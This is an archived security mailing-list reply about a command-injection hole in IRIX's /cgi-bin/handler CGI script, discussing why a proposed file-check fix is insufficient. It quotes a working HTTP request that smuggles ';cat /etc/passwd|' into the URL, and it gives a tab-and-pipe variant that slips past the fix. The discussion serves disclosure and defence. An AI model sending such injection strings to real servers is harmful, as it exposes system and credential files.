Re: /cgi-bin/handler - more notes

• Messages sorted by: [ date ][ thread ][ subject ][ author ]
• Next message: Robert Zilbauer: "Re: wu-ftpd beta 13 Upload Ownership/Permissions Bug"
• Previous message: Tom Guptill: "listserv buffer overflow(s)"
• Maybe in reply to: Razvan Dragomirescu: "/cgi-bin/handler - more notes"
• Next in thread: Ariel Biener: "Re: /cgi-bin/handler - more notes"

> telnet target.machine.com 80
> GET /cgi-bin/handler/whatever;cat /etc/passwd| ?data=Download
> HTTP/1.0

> [...To fix this right...]
> All "open" commands should check if the their argument is really a
> filename. You could use:

> -f $doc && open (INPUT, $doc)

If you have untrusted local users who can install their own cgi-bin
stuff (I know of at least one large site that is in this situation),
this isn't enough. /cgi-bin/handler/whatever;cat\t/etc/passwd\|\t may
well exist, and open() will _still_ take it as a pipe.

> So far, IRIX versions 5.3, 6.2, and now 6.3 are vulnerable.
> Anyone on IRIX 6.4? :) (What does it run on BTW?)

I know of one site with an Octane that runs 6.4. I'd try this, but
that site runs exactly one web server, and it ain't SGI's. I could
turn on the web server on the Octane, I suppose, but I'm hesitant to
mess with it....

der Mouse

mouse@rodents.montreal.qc.ca
7D C8 61 52 5D E7 2D 39 4E F1 31 3E E8 B3 27 4B

• Next message: Robert Zilbauer: "Re: wu-ftpd beta 13 Upload Ownership/Permissions Bug"
• Previous message: Tom Guptill: "listserv buffer overflow(s)"
• Maybe in reply to: Razvan Dragomirescu: "/cgi-bin/handler - more notes"
• Next in thread: Ariel Biener: "Re: /cgi-bin/handler - more notes"